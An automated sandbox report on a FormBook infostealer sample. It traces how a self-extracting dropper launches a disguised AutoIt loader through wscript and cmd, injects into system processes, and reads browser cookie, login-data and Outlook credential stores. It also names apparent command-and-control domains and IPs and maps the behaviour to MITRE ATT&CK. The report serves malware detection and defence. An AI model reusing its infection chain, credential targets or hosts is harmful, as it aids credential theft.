            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6-646b6i6p6w6~6memstr_10a8af7d-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7'7-787?7h7e7|7memstr_158c9ccf-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8c9o9memstr_8d4ef8bd-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :":-:4:?:f:q:x:c:j:u:|:memstr_429578b7-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;$;/;x;memstr_5a4c654a-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <#<9<l<r<i<~<memstr_7e095443-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =&=6=memstr_ff753261-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3%3)3-3!5(5]5-61656a8k8x8&:g:memstr_a70237f3-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;a;n;memstr_faad9444-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <#<:<t<z<c<p<z<memstr_85ee55c2-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 161c1=2a2e2i2m2q2u2y2]2a2e2i2m2q2u2memstr_89f42078-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 434h4u4^4p4{4memstr_84a14670-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5a5t5memstr_c9bc8607-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 45a5t5memstr_0b40ad28-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 56h6memstr_e1f34247-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 707m7memstr_b158d36c-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9l:";/;w;memstr_0f621d0d-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 040p0l0r0memstr_4087002a-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 033a3memstr_c74aa62d-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5%5f5m5|5memstr_7bf2ce41-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7(7g7n7o7v7memstr_786abf3b-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8 838\8h8w8~8memstr_7a753c21-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8:9f9{9memstr_fe3faffa-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :3:::i:memstr_118dafb3-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;:;k;];c;|;memstr_1c9bca59-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;%<u<memstr_11d09016-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =%=.=f=memstr_e266db37-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?3?c?memstr_46198f0b-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @0l0s0l0memstr_11a6ec29-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1&1.171>1memstr_6fd24f33-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1s2[2l2t2memstr_c5897edb-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3+4v4memstr_038998ba-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4%5z5|5memstr_6febe49d-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 616e6memstr_ffcd16f9-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7;7h7}7memstr_ac52134b-a
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8)8@8^8memstr_9448a724-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9=9r9]9r9memstr_b80dda38-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;\;|;memstr_38ece99d-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150429044.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =)=h=memstr_458e44c8-2
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DCBB02 SendInput,keybd_event,8_2_00DCBB02
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DCEBE5 mouse_event,8_2_00DCEBE5
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bpqdpksed.icm vbepwhj.mp3Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm bpqdpksed.icm vbepwhj.mp3Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeProcess created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DC13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,8_2_00DC13F2
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DC1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,8_2_00DC1EF3
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000705F000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.000000000195B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: rmfPfCOHcNt.exe, 00000015.00000002.3357233607.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, rmfPfCOHcNt.exe, 00000015.00000000.2562879559.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000000.2725834572.0000000000F71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: bpqdpksed.icm, 00000008.00000003.2402044171.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401355186.00000000018C3000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402065265.00000000018D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: bpqdpksed.icm, rmfPfCOHcNt.exe, 00000015.00000002.3357233607.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, rmfPfCOHcNt.exe, 00000015.00000000.2562879559.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000000.2725834572.0000000000F71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: rmfPfCOHcNt.exe, 00000015.00000002.3357233607.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, rmfPfCOHcNt.exe, 00000015.00000000.2562879559.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000000.2725834572.0000000000F71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: bpqdpksed.icm, 00000008.00000003.2281306225.0000000001864000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2281363015.0000000001875000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
            Source: vbepwhj.mp3.8.dr, vbepwhj.mp3.0.drBinary or memory string: If WinGetText("Program Manager") = "0" Then
            Source: rmfPfCOHcNt.exe, 00000015.00000002.3357233607.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, rmfPfCOHcNt.exe, 00000015.00000000.2562879559.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000000.2725834572.0000000000F71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: bpqdpksed.icm, 00000008.00000003.2402123041.000000000186E000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402448833.0000000001874000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402241481.0000000001873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then]

            Language, Device and Operating System Detection

            barindex
            Yara detected Autoit Injector
            Source: Yara matchFile source: Process Memory Space: bpqdpksed.icm PID: 5156, type: MEMORYSTR
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E86694 cpuid 0_2_00E86694
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00E7FD34
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E8454A GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00E8454A
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DBE5F8 GetUserNameW,8_2_00DBE5F8
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D9BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_00D9BCF2
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E703BE GetVersionExW,0_2_00E703BE
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: bpqdpksed.icm, 00000008.00000003.2402832390.000000000192F000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2403656375.0000000001930000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402574812.000000000192E000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401698198.0000000001928000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
            Source: bpqdpksed.icm, 00000008.00000003.2402832390.000000000192F000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2403656375.0000000001930000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402574812.000000000192E000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401698198.0000000001928000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.3357840971.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.3355319843.00000000022E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.3355834381.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3357716278.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2647394884.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: bpqdpksed.icmBinary or memory string: WIN_81
            Source: bpqdpksed.icmBinary or memory string: WIN_XP
            Source: bpqdpksed.icm.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: bpqdpksed.icmBinary or memory string: WIN_XPe
            Source: bpqdpksed.icmBinary or memory string: WIN_VISTA
            Source: bpqdpksed.icmBinary or memory string: WIN_7
            Source: bpqdpksed.icmBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.3357840971.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.3355319843.00000000022E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.3355834381.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3357716278.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2647394884.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DE2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,8_2_00DE2163
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DE1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,8_2_00DE1B61

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		2
            Valid Accounts            		1
            Native API            		1
            Scripting            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt2
            Valid Accounts            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron1
            Registry Run Keys / Startup Folder            		2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS128
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            Software Packing            		LSA Secrets361
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts612
            Process Injection            		1
            DLL Side-Loading            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
            Registry Run Keys / Startup Folder            		11
            Masquerading            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
            Valid Accounts            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
            Virtualization/Sandbox Evasion            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
            Access Token Manipulation            		Network Sniffing1
            System Network Configuration Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd612
            Process Injection            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1550252 Sample: FS04dlvJrq.exe Startdate: 06/11/2024 Architecture: WINDOWS Score: 100 70 x105.jieruitech.info 2->70 72 www.uphc255.vip 2->72 74 7 other IPs or domains 2->74 84 Suricata IDS alerts for network traffic 2->84 86 Malicious sample detected (through community Yara rule) 2->86 88 Multi AV Scanner detection for submitted file 2->88 90 9 other signatures 2->90 13 FS04dlvJrq.exe 3 33 2->13         started        signatures3 process4 file5 66 C:\Users\user\AppData\Local\...\bpqdpksed.icm, PE32 13->66 dropped 68 C:\Users\user\AppData\Local\Temp\...\tsmr.vbe, Unicode 13->68 dropped 114 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->114 17 wscript.exe 1 13->17         started        signatures6 process7 signatures8 82 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->82 20 cmd.exe 1 17->20         started        22 cmd.exe 1 17->22         started        25 cmd.exe 1 17->25         started        process9 signatures10 27 bpqdpksed.icm 1 30 20->27         started        31 conhost.exe 20->31         started        100 Uses ipconfig to lookup or modify the Windows network settings 22->100 33 conhost.exe 22->33         started        35 ipconfig.exe 1 22->35         started        37 conhost.exe 25->37         started        39 ipconfig.exe 1 25->39         started        process11 file12 60 C:\Users\user\AppData\...\bpqdpksed.icm.exe, PE32 27->60 dropped 62 C:\Users\user\AppData\...\bpqdpksed.icm.exe, PE32 27->62 dropped 64 C:\Users\user\AppData\...\bpqdpksed.icm, PE32 27->64 dropped 106 Found API chain indicative of sandbox detection 27->106 108 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 27->108 110 Writes to foreign memory regions 27->110 112 2 other signatures 27->112 41 RegSvcs.exe 27->41         started        44 RegSvcs.exe 27->44         started        signatures13 process14 signatures15 104 Maps a DLL or memory area into another process 41->104 46 rmfPfCOHcNt.exe 41->46 injected 49 WerFault.exe 2 44->49         started        process16 signatures17 116 Found direct / indirect Syscall (likely to bypass EDR) 46->116 51 EhStorAuthn.exe 13 46->51         started        process18 signatures19 92 Tries to steal Mail credentials (via file / registry access) 51->92 94 Tries to harvest and steal browser information (history, passwords, etc) 51->94 96 Modifies the context of a thread in another process (thread injection) 51->96 98 3 other signatures 51->98 54 rmfPfCOHcNt.exe 51->54 injected 58 firefox.exe 51->58         started        process20 dnsIp21 76 www.integritywork.shop 216.40.34.41, 49982, 80 TUCOWSCA Canada 54->76 78 www.sadey.info 162.0.225.218, 49994, 49995, 49996 NAMECHEAP-NETUS Canada 54->78 80 2 other IPs or domains 54->80 102 Found direct / indirect Syscall (likely to bypass EDR) 54->102 signatures22

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            FS04dlvJrq.exe47%ReversingLabsWin32.Trojan.Leonem

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm.exe0%ReversingLabs
            C:\Users\user\AppData\Roaming\uhex\bpqdpksed.icm0%ReversingLabs
